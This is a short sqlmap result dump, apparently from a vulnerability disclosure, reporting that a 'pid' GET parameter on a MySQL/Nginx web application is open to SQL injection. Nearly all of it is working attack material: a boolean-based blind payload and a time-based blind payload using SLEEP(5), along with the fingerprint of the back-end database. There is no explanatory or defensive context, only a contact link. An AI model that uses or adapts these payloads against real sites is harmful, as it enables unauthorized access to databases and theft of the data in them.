"pid" parameter is vulnerable.
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=3166' AND 4428=4428 AND 'kmgb'='kmgb
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=3166' AND SLEEP(5) AND 'jLSF'='jLSF
---
the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
-----------------------------------------------------------------------------------------------------------------------------------------------
Contact: https://twitter.com/aliabdollahi2